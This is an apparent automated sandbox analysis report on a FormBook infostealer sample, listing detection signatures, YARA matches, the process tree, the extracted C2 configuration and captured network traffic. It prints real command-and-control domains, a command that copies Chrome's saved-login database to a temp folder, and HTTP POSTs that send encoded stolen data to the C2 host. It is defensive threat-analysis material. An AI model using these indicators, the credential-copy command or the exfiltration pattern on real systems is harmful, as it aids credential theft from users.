Play interactive tourEdit tour

# Windows Analysis Report WZ454554.exe

## Overview

### General Information

 Sample Name: WZ454554.exe Analysis ID: 552851 MD5: 58b39c2620cdda3d3fa6a125f476fc9f SHA1: 5d2672c79e9dffb2cdeee0d00e406c03c762985c SHA256: fdf39d043cc55d6a72b1fe01c9067bb7591d5c379798499148521e6158afeea0 Tags: exeformbook Infos: Most interesting Screenshot:

### Detection

 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

### Classification

 System is w10x64WZ454554.exe (PID: 6628 cmdline: "C:\Users\user\Desktop\WZ454554.exe" MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)WZ454554.exe (PID: 6936 cmdline: C:\Users\user\Desktop\WZ454554.exe MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)Hyrzbcwcas.exe (PID: 1840 cmdline: "C:\Users\user\Contacts\Hyrzbcwcas.exe" MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)Hyrzbcwcas.exe (PID: 5708 cmdline: C:\Users\user\Contacts\Hyrzbcwcas.exe MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)Hyrzbcwcas.exe (PID: 7108 cmdline: "C:\Users\user\Contacts\Hyrzbcwcas.exe" MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)Hyrzbcwcas.exe (PID: 6340 cmdline: C:\Users\user\Contacts\Hyrzbcwcas.exe MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)help.exe (PID: 6656 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)cmd.exe (PID: 4324 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)cmd.exe (PID: 5628 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)help.exe (PID: 5832 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)cleanup
``{"C2 list": ["www.spiegelpherese.com/m9g2/"], "decoy": ["pubgnewstatedl.com", "guidedwaveradar.com", "onlineexitpoll.com", "mutationdesign.com", "p60p.com", "xhcaijing.com", "skpcart.store", "houseathomes.com", "thenorthdale.com", "kvkkkararozetleri.com", "formecondominium.com", "7808lll.com", "mitchfletcher.com", "thatsawrapfl.com", "glrinternationalfzco.com", "dbmxkgek.com", "feelingfancy.com", "nishieihuku.com", "newearthhg.com", "tenlog040.xyz", "savche.xyz", "solarofoundation.com", "sk8.network", "schooljoy.net", "ioannismitsialisgerman.online", "hooklinen.com", "gorgeousingems.com", "directusimmigration.com", "nexxt.info", "itecsecure.com", "chairsexpert.com", "yandex-check.online", "ivdripspace.com", "sentlogisticsja.com", "mdk-clothing.com", "quick2repair.net", "thisflippingfamily.com", "lu-dra.xyz", "degenape.art", "evodiocese2022scm.com", "churchofrocknroll.com", "visionaryblock.com", "jornalonlinealagoas.com", "rainbow-of-light.com", "oblical.com", "preserveliqueur.com", "morbidthings.com", "panoramaregency.com", "iphone13promax.review", "gongyingmi.com", "xqzs72.com", "sgmoda.com", "boogiereaper.com", "bitesofwellness.online", "backdad.com", "freeimperia.com", "senerants.tech", "029yu.xyz", "dhakhtar.net", "cnclighting.com", "iplmatchwinner.com", "thpt.space", "naris.net", "hamgirls.com"]}``
SourceRuleDescriptionAuthorStrings
SourceRuleDescriptionAuthorStrings
C:\Users\user\Contacts\sacwcbzryH.urlMethodology_Shortcut_HotKeyDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
• 0x58:\$hotkey: \x0AHotKey=3
• 0x0:\$url_explicit: [InternetShortcut]
C:\Users\user\Contacts\sacwcbzryH.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
• 0x14:\$file: URL=
• 0x0:\$url_explicit: [InternetShortcut]
SourceRuleDescriptionAuthorStrings
0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x16b5:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x11a1:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x17b7:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x192f:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x41c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0x78f7:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x890a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x4819:\$sqlite3step: 68 34 1C 7B E1
• 0x492c:\$sqlite3step: 68 34 1C 7B E1
• 0x4848:\$sqlite3text: 68 38 2A 90 C5
• 0x496d:\$sqlite3text: 68 38 2A 90 C5
• 0x485b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x4983:\$sqlite3blob: 68 53 D8 7F 8C
Click to see the 86 entries
SourceRuleDescriptionAuthorStrings
21.1.Hyrzbcwcas.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
21.1.Hyrzbcwcas.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x9908:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b82:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x156b5:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x151a1:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x157b7:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x1592f:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa59a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x1441c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb293:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1b8f7:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1c90a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
21.1.Hyrzbcwcas.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x18819:\$sqlite3step: 68 34 1C 7B E1
• 0x1892c:\$sqlite3step: 68 34 1C 7B E1
• 0x18848:\$sqlite3text: 68 38 2A 90 C5
• 0x1896d:\$sqlite3text: 68 38 2A 90 C5
• 0x1885b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x18983:\$sqlite3blob: 68 53 D8 7F 8C
17.2.Hyrzbcwcas.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
17.2.Hyrzbcwcas.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x9908:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b82:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x156b5:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x151a1:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x157b7:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x1592f:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa59a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x1441c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb293:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1b8f7:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1c90a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 67 entries

## Sigma Overview

No Sigma rule has matched

## Jbx Signature Overview

### AV Detection:

 Found malware configuration Show sources
 Source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.spiegelpherese.com/m9g2/"], "decoy": ["pubgnewstatedl.com", "guidedwaveradar.com", "onlineexitpoll.com", "mutationdesign.com", "p60p.com", "xhcaijing.com", "skpcart.store", "houseathomes.com", "thenorthdale.com", "kvkkkararozetleri.com", "formecondominium.com", "7808lll.com", "mitchfletcher.com", "thatsawrapfl.com", "glrinternationalfzco.com", "dbmxkgek.com", "feelingfancy.com", "nishieihuku.com", "newearthhg.com", "tenlog040.xyz", "savche.xyz", "solarofoundation.com", "sk8.network", "schooljoy.net", "ioannismitsialisgerman.online", "hooklinen.com", "gorgeousingems.com", "directusimmigration.com", "nexxt.info", "itecsecure.com", "chairsexpert.com", "yandex-check.online", "ivdripspace.com", "sentlogisticsja.com", "mdk-clothing.com", "quick2repair.net", "thisflippingfamily.com", "lu-dra.xyz", "degenape.art", "evodiocese2022scm.com", "churchofrocknroll.com", "visionaryblock.com", "jornalonlinealagoas.com", "rainbow-of-light.com", "oblical.com", "preserveliqueur.com", "morbidthings.com", "panoramaregency.com", "iphone13promax.review", "gongyingmi.com", "xqzs72.com", "sgmoda.com", "boogiereaper.com", "bitesofwellness.online", "backdad.com", "freeimperia.com", "senerants.tech", "029yu.xyz", "dhakhtar.net", "cnclighting.com", "iplmatchwinner.com", "thpt.space", "naris.net", "hamgirls.com"]}
 Multi AV Scanner detection for submitted file Show sources
 Source: WZ454554.exe Virustotal: Detection: 22% Perma Link Source: WZ454554.exe ReversingLabs: Detection: 39%
 Yara detected FormBook Show sources
 Source: Yara match File source: 21.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 17.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 9.2.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 21.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 9.0.WZ454554.exe.400000.5.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 9.1.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 17.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 17.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 21.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 21.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 21.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 17.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 9.2.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 17.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 9.0.WZ454554.exe.400000.4.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 9.1.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 17.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 21.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000014.00000002.556874060.0000000002B10000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000009.00000002.407793404.00000000005E0000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000015.00000000.418862410.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000011.00000002.428947591.00000000005A0000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000015.00000002.436930793.00000000008F0000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000015.00000000.419325156.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000009.00000000.324007988.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000011.00000000.399621636.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000015.00000002.436845866.00000000008C0000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000011.00000001.400349591.0000000000400000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000009.00000001.324511598.0000000000400000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000015.00000002.436315053.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000011.00000000.400048444.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000009.00000002.407725220.00000000005B0000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000011.00000002.429108861.00000000005D0000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 0000001C.00000002.437292259.0000000002AD0000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000014.00000002.559355148.0000000003070000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000015.00000001.419503342.0000000000400000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000009.00000000.324380363.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000019.00000002.431106841.0000000003000000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, type: MEMORY
 Multi AV Scanner detection for dropped file Show sources
 Source: C:\Users\user\Contacts\Hyrzbcwcas.exe ReversingLabs: Detection: 39%
 Antivirus or Machine Learning detection for unpacked file Show sources
 Source: 9.2.WZ454554.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 17.1.Hyrzbcwcas.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 21.1.Hyrzbcwcas.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 21.2.Hyrzbcwcas.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 17.2.Hyrzbcwcas.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 9.1.WZ454554.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
 Uses 32bit PE files Show sources
 Source: WZ454554.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
 Uses secure TLS version for HTTPS connections Show sources
 Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49746 version: TLS 1.2 Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49750 version: TLS 1.2 Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49751 version: TLS 1.2
 Binary contains paths to debug symbols Show sources
 Source: Binary string: wntdll.pdbUGP source: WZ454554.exe, 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, WZ454554.exe, 00000009.00000002.409087872.0000000000BAF000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000011.00000002.429687044.0000000000B5F000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, help.exe, 00000014.00000002.559731759.00000000031E0000.00000040.00000001.sdmp, help.exe, 00000014.00000002.560116485.00000000032FF000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437079630.0000000000980000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000003.420862619.00000000007E0000.00000004.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437691847.0000000000A9F000.00000040.00000001.sdmp, cmd.exe, 00000019.00000002.431480106.00000000037E0000.00000040.00000001.sdmp, cmd.exe, 00000019.00000002.433718675.00000000038FF000.00000040.00000001.sdmp, help.exe, 0000001C.00000002.437536905.00000000033C0000.00000040.00000001.sdmp, help.exe, 0000001C.00000002.437717560.00000000034DF000.00000040.00000001.sdmp Source: Binary string: cmd.pdbUGP source: Hyrzbcwcas.exe, 00000011.00000002.432784499.0000000000DD0000.00000040.00020000.sdmp, cmd.exe, 00000019.00000000.427671130.0000000000D80000.00000040.00020000.sdmp, cmd.exe, 00000019.00000002.430750073.0000000000D80000.00000040.00020000.sdmp Source: Binary string: wntdll.pdb source: WZ454554.exe, WZ454554.exe, 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, WZ454554.exe, 00000009.00000002.409087872.0000000000BAF000.00000040.00000001.sdmp, Hyrzbcwcas.exe, Hyrzbcwcas.exe, 00000011.00000002.429687044.0000000000B5F000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, help.exe, 00000014.00000002.559731759.00000000031E0000.00000040.00000001.sdmp, help.exe, 00000014.00000002.560116485.00000000032FF000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437079630.0000000000980000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000003.420862619.00000000007E0000.00000004.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437691847.0000000000A9F000.00000040.00000001.sdmp, cmd.exe, 00000019.00000002.431480106.00000000037E0000.00000040.00000001.sdmp, cmd.exe, 00000019.00000002.433718675.00000000038FF000.00000040.00000001.sdmp, help.exe, 0000001C.00000002.437536905.00000000033C0000.00000040.00000001.sdmp, help.exe, 0000001C.00000002.437717560.00000000034DF000.00000040.00000001.sdmp Source: Binary string: help.pdbGCTL source: WZ454554.exe, 00000009.00000002.408113212.0000000000659000.00000004.00000020.sdmp, WZ454554.exe, 00000009.00000002.413836751.0000000002A50000.00000040.00020000.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437020676.0000000000950000.00000040.00020000.sdmp Source: Binary string: help.pdb source: WZ454554.exe, 00000009.00000002.408113212.0000000000659000.00000004.00000020.sdmp, WZ454554.exe, 00000009.00000002.413836751.0000000002A50000.00000040.00020000.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437020676.0000000000950000.00000040.00020000.sdmp Source: Binary string: cmd.pdb source: Hyrzbcwcas.exe, 00000011.00000002.432784499.0000000000DD0000.00000040.00020000.sdmp, cmd.exe, 00000019.00000000.427671130.0000000000D80000.00000040.00020000.sdmp, cmd.exe, 00000019.00000002.430750073.0000000000D80000.00000040.00020000.sdmp
 Found inlined nop instructions (likely shell or obfuscated code) Show sources
 Source: C:\Users\user\Desktop\WZ454554.exe Code function: 4x nop then pop esi 9_2_004172E0 Source: C:\Users\user\Desktop\WZ454554.exe Code function: 4x nop then pop esi 9_2_004172F4 Source: C:\Users\user\Desktop\WZ454554.exe Code function: 4x nop then pop ebx 9_2_00407B1A Source: C:\Users\user\Desktop\WZ454554.exe Code function: 4x nop then pop edi 9_2_00416CB1 Source: C:\Users\user\Contacts\Hyrzbcwcas.exe Code function: 4x nop then pop esi 17_2_004172E0 Source: C:\Users\user\Contacts\Hyrzbcwcas.exe Code function: 4x nop then pop esi 17_2_004172F4 Source: C:\Users\user\Contacts\Hyrzbcwcas.exe Code function: 4x nop then pop ebx 17_2_00407B1A Source: C:\Users\user\Contacts\Hyrzbcwcas.exe Code function: 4x nop then pop edi 17_2_00416CB1

### Networking:

 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) Show sources
 Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 34.102.136.180:80 Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 34.102.136.180:80 Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 34.102.136.180:80
 System process connects to network (likely due to code injection or exploit) Show sources
 Source: C:\Windows\explorer.exe Domain query: www.sentlogisticsja.com Source: C:\Windows\explorer.exe Domain query: www.senerants.tech Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
 C2 URLs / IPs found in malware configuration Show sources
 Source: Malware configuration extractor URLs: www.spiegelpherese.com/m9g2/
 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /m9g2/?xXV=6l9PRhy0D4S&GvW=sz5ErymDSipaI2rGHMiHzQDn8335WrDZWT7fmGUTYuWWeT2KiLBKARdoGEtcQCocu9tS HTTP/1.1Host: www.sentlogisticsja.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: POST /m9g2/ HTTP/1.1Host: www.sentlogisticsja.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.sentlogisticsja.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sentlogisticsja.com/m9g2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 76 57 3d 6b 52 31 2d 31 57 32 49 66 69 6b 71 56 31 57 2d 65 70 48 42 74 33 28 62 72 55 7a 4b 55 37 33 73 55 55 72 5a 7a 31 55 56 52 74 43 71 61 41 53 53 76 4c 49 55 4f 46 51 61 65 42 4e 34 4d 68 41 52 73 4f 41 4e 32 5a 52 39 72 4c 6a 76 46 4f 65 52 46 6a 6b 6a 32 5f 78 41 44 55 76 5f 67 61 55 64 54 64 53 59 47 77 28 45 41 42 54 74 71 33 73 61 48 7a 5a 54 36 72 5a 53 47 39 4f 6f 6e 51 71 68 52 73 7e 70 63 52 32 34 57 62 6b 79 70 30 32 75 31 4a 4b 49 48 32 47 75 49 6d 5a 42 45 49 42 74 61 79 54 46 49 6a 33 63 31 39 44 6a 6c 72 69 58 6e 45 52 30 61 62 48 7a 61 32 4a 42 79 74 59 6b 4b 6a 50 4c 66 5a 50 74 35 68 79 6a 51 47 32 62 32 64 61 66 6f 49 51 65 4a 4c 59 4e 28 71 59 6b 47 6a 77 35 49 54 4c 4d 51 6f 68 35 4d 77 72 4e 42 63 6b 72 6d 49 34 4c 4e 6c 7e 59 6e 59 6d 34 6c 7a 58 43 6e 37 38 4b 28 36 54 5a 49 30 76 32 5a 74 47 5a 70 67 72 2d 32 38 57 6a 77 61 77 68 50 35 6c 4e 45 6f 42 6b 36 50 4c 78 66 6c 62 49 37 4a 38 73 39 2d 63 6e 51 77 32 53 69 4f 64 59 46 77 28 45 4c 4e 48 75 57 51 45 34 62 69 4d 5a 46 77 54 7a 52 73 4f 52 73 75 76 4a 28 7a 78 46 4d 48 64 37 34 75 39 6c 6c 32 4f 66 71 44 59 78 4b 64 57 51 45 68 30 4a 6e 42 4a 63 69 70 4e 4f 78 37 4d 41 28 71 41 42 49 78 76 76 72 49 6b 4e 6c 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: GvW=kR1-1W2IfikqV1W-epHBt3(brUzKU73sUUrZz1UVRtCqaASSvLIUOFQaeBN4MhARsOAN2ZR9rLjvFOeRFjkj2_xADUv_gaUdTdSYGw(EABTtq3saHzZT6rZSG9OonQqhRs~pcR24Wbkyp02u1JKIH2GuImZBEIBtayTFIj3c19DjlriXnER0abHza2JBytYkKjPLfZPt5hyjQG2b2dafoIQeJLYN(qYkGjw5ITLMQoh5MwrNBckrmI4LNl~YnYm4lzXCn78K(6TZI0v2ZtGZpgr-28WjwawhP5lNEoBk6PLxflbI7J8s9-cnQw2SiOdYFw(ELNHuWQE4biMZFwTzRsORsuvJ(zxFMHd74u9ll2OfqDYxKdWQEh0JnBJcipNOx7MA(qABIxvvrIkNlQ). Source: global traffic HTTP traffic detected: POST /m9g2/ HTTP/1.1Host: www.sentlogisticsja.comConnection: closeContent-Length: 149769Cache-Control: no-cacheOrigin: http://www.sentlogisticsja.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sentlogisticsja.com/m9g2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 76 57 3d 6b 52 31 2d 31 57 43 36 50 43 78 73 52 48 79 37 66 35 58 5a 6e 58 4f 43 36 46 54 56 64 49 6e 53 4f 44 61 65 7a 30 6b 52 65 4f 4b 43 51 41 69 53 6e 70 52 64 44 46 51 5a 59 42 4e 5f 61 52 63 74 79 73 51 37 32 64 68 48 72 4c 62 73 50 76 75 51 46 7a 6c 72 32 66 39 38 46 55 37 76 67 63 55 34 53 34 43 2d 4e 51 37 45 5a 78 37 72 76 6b 6b 52 47 32 70 51 34 62 46 58 45 39 57 78 6e 6a 76 42 53 4a 7e 4c 62 51 61 2d 52 74 6b 44 6d 58 28 78 78 65 75 4d 4a 47 36 74 48 46 6c 53 4b 4c 6c 70 66 33 7a 37 55 78 66 66 72 39 72 6c 67 73 48 71 6a 32 39 6e 59 4c 33 42 61 33 4d 38 71 4c 78 36 59 51 37 54 51 49 44 58 32 30 57 6c 63 56 4f 54 79 66 43 69 71 4c 49 68 4c 4f 6b 53 37 36 46 6b 46 68 59 70 4d 33 6e 6e 57 5a 74 39 5a 53 44 44 41 76 49 6a 7e 34 6f 30 45 48 65 31 74 73 72 33 78 51 37 57 70 37 38 68 7a 61 54 56 51 32 33 4f 4f 36 65 43 6f 67 61 5a 71 2d 33 35 36 70 45 6c 4f 4e 5a 56 42 4c 52 6c 34 66 58 74 51 30 72 77 78 61 51 6c 37 63 41 44 55 77 32 50 6d 4e 31 54 46 77 7e 39 4c 50 75 35 58 68 67 34 62 7a 74 44 49 7a 4c 4a 41 38 4f 51 70 2d 28 4c 6d 77 5a 56 4d 48 46 37 35 62 59 74 33 56 65 66 74 56 63 79 4a 35 43 51 58 42 30 4a 71 68 4a 43 79 4a 67 34 7a 34 63 32 74 4b 67 5a 66 47 65 6f 71 70 42 37 6e 47 67 4e 54 35 44 53 5a 47 52 4f 74 61 4f 79 74 44 41 6d 53 50 71 64 68 65 75 44 4f 46 59 39 49 59 79 48 45 65 4b 2d 7e 73 7e 6a 59 33 4a 5f 48 64 62 68 6e 61 74 45 75 32 59 64 53 5a 47 79 6e 4e 35 55 76 4a 6a 48 4e 78 42 54 45 48 72 71 63 73 68 61 75 42 6d 6e 59 74 4a 73 45 4e 49 2d 64 45 6e 2d 69 6f 32 55 4f 47 4b 65 32 42 4b 52 44 32 37 35 33 78 44 53 71 7a 28 51 45 56 69 32 32 41 78 66 4b 4e 79 6b 4d 66 41 78 4d 41 77 78 7a 34 58 49 63 6d 42 53 39 69 32 4d 28 5a 65 66 35 2d 75 43 39 4c 63 4d 6c 6e 39 39 77 2d 31 4f 52 4c 47 65 56 6c 43 77 47 32 34 5a 66 6c 56 32 69 55 4e 34 6c 59 75 65 58 70 72 77 6b 47 49 56 42 6e 4f 52 47 34 50 51 62 49 41 74 4d 4f 48 74 5a 41 62 75 77 38 34 46 55 67 64 59 66 31 6d 32 48 38 65 5f 37 56 78 79 70 36 63 4b 41 44 65 4d 61 37 70 61 45 32 4e 75 68 75 30 77 77 4e 30 7a 4c 74 51 2d 42 6a 62 41 4b 70 73 45 4f 43 48 73 70 76 77 43 79 66 47 74 4a 39 75 61 57 56 30 77 51 4e 51 59 39 46 6a 61 43 43 51 4b 46 5a 72 6f 6f 31 41 4a 36 75 76 46 38 48 58 76 78 41 67 53 68 51 39 63 